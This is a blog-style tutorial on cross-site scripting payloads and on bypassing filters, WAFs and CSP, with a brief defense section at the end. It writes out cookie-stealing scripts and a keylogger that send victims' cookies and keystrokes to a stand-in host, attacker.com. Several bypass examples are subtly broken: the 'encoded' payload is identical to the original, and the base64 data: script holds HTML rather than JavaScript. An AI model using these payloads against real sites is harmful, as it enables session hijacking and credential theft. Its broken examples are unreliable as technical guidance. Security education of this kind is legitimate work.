Part 7: Cross-Site Scripting (XSS) Series - XSS Payloads and Advanced Techniques

Author: Trix Cyrus

Waymap Pentesting tool: Click Here
TrixSec Github: Click Here
TrixSec Telegram: Click Here

Cross-Site Scripting (XSS) attacks are not only about injecting scripts into web applications but also about crafting payloads that are effective in bypassing defenses and achieving malicious goals. This part dives into various types of XSS payloads and advanced techniques that attackers use to exploit vulnerabilities and evade detection.

Common XSS Payloads

Understanding the different types of payloads is critical for both attackers and defenders. These payloads are used to trigger various malicious behaviors in web applications, typically leading to unauthorized access or theft of sensitive information.

1. Basic XSS Payloads

   • Alert Payload: One of the simplest and most common payloads in an XSS attack is the alert payload. It executes a JavaScript alert box in the victim’s browser, confirming that the injection point works.

    <script>alert('XSS');</script>
   

   This payload is often used for testing and confirming XSS vulnerabilities. While it’s harmless by itself, it showcases that the attacker can inject and execute code on the victim's browser.

• Alert with Dynamic Message:
  Attackers can also inject dynamic content into the alert message, such as user-provided input:
  

   <script>alert(document.location.search);</script>
  

  This will display the query string of the current URL, giving the attacker insight into potential vulnerable parameters for further exploitation.

1. Cookie Stealing Payloads
   XSS is often used to steal sensitive session cookies and send them to an external attacker-controlled server. This can enable the attacker to hijack the victim’s session and impersonate them.

   • Example:

    <script>document.location='http://attacker.com?cookie=' + document.cookie;</script>
   

   This payload sends the victim’s cookies to the attacker's server. Once captured, the attacker can use these cookies to impersonate the victim or bypass authentication mechanisms.

• Keylogging Payloads:
  More advanced XSS attacks may involve keylogging scripts, which can silently capture every keystroke the user makes, including passwords, credit card details, and other sensitive data.
  

   <script>
   var log = '';
   document.onkeydown = function(event) {
       log += event.key;
       if (log.length > 100) {
           fetch('http://attacker.com/log', {
               method: 'POST',
               body: log
           });
           log = '';
       }
   };
   </script>
  

  This payload listens for keydown events and sends the collected data to the attacker’s server, potentially compromising sensitive information without the user knowing.

Bypassing Filters: Advanced Techniques

Web application defenses, like Web Application Firewalls (WAFs), Content Security Policies (CSP), and input sanitization mechanisms, are designed to block malicious scripts from executing. However, attackers have developed numerous methods to bypass these protections.

1. Encoding and Obfuscation One of the most effective ways to bypass filters is encoding or obfuscating the payloads. Encoding characters like <, >, and " into their HTML or URL-encoded equivalents can evade filters that look for these special characters.

• Example (HTML Entity Encoding):
  

   <script>alert('XSS');</script>
  

  Can be encoded as:
  

   <script>alert('XSS');</script>
  

  This payload works the same way but is often overlooked by basic filters that don’t decode entities before validation.

• URL Encoding:
  

   %3Cscript%3Ealert('XSS')%3C/script%3E
  

  Attackers can use URL encoding to bypass restrictions that check for specific characters in URL parameters or form submissions.

1. Bypassing WAFs with Non-standard Syntax Some WAFs attempt to block common payloads like <script>, but they may not handle more creative or less conventional input correctly.

• Example (String Concatenation):
  Instead of directly using <script>, the attacker may use a string concatenation method to split the payload into segments:
  

   <scr"+"ipt>alert('XSS');</scr"+"ipt>
  

  This kind of technique exploits the fact that some WAFs are not sophisticated enough to detect these manipulations.

• Using Event Handlers:
  WAFs might focus on blocking script tags, but event handlers like onmouseover, onerror, or onclick can still be used to trigger scripts. For example:
  

   <img src="x" onerror="alert('XSS');">
  

  The onerror event triggers when the image fails to load, and the injected script is executed. This bypasses filters that block <script> but don’t sanitize event handlers.

1. Leveraging DOM-based XSS to Evade Detection DOM-based XSS attacks manipulate the Document Object Model (DOM) of the page using JavaScript, often without sending data to the server. These types of attacks are harder to detect because the malicious script is dynamically created in the browser rather than directly injected into the HTML from a server response.

• Example:
  A DOM-based XSS attack could target the document.location or innerHTML properties:
  

   <script>
   document.location = 'http://attacker.com?cookie=' + document.cookie;
   </script>
  

  This payload manipulates the document.location to send the victim’s cookies to an attacker-controlled server. The attack can bypass traditional input filters because the script operates entirely within the client’s browser.

1. Bypassing Content Security Policy (CSP) CSP is an effective mechanism to prevent XSS by restricting where scripts can be loaded from, but attackers can sometimes bypass it with advanced techniques.

• Using Inline Event Handlers:
  Even if inline scripts are blocked, event handlers like onclick, onmouseover, or onerror can still be used to execute payloads. For instance:
  

   <img src="x" onerror="alert(1)">
  

  This can bypass CSP rules that prevent inline JavaScript by relying on event handlers.

• Base64 Encoding:
  Some CSP configurations allow the use of data: URIs for script execution, but attackers can encode malicious scripts as Base64:
  

   <script src="data:text/javascript;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="></script>
  

  This allows attackers to inject their script even in environments where inline scripts are blocked.

Defense Strategies: Mitigating XSS Attacks

1. Sanitize Input Thoroughly:
   Always sanitize user input by validating and escaping dangerous characters such as <, >, and ". Tools like OWASP Java Encoder and OWASP AntiSamy can help protect your application from XSS.

2. Use Content Security Policy (CSP):
   Implement CSP to restrict which resources can be loaded and executed. This can significantly reduce the impact of XSS by preventing the execution of unauthorized scripts.

3. Implement Secure JavaScript Frameworks:
   Use JavaScript frameworks (like React or Angular) that automatically handle escaping and sanitization, reducing the likelihood of introducing XSS vulnerabilities.

4. Monitor and Log Suspicious Activity:
   Regularly monitor your web applications for any suspicious behavior, like unusual JavaScript execution patterns or unexpected requests. Implementing a WAF with advanced protection can help detect and mitigate these attacks in real time.

Conclusion

By understanding these advanced XSS payloads and techniques, web developers and security professionals can better defend against attacks that target client-side vulnerabilities. The key is to use a combination of sanitization, encoding, and modern defense mechanisms like CSP to ensure that XSS attacks are thwarted before they can cause damage.

~Trixsec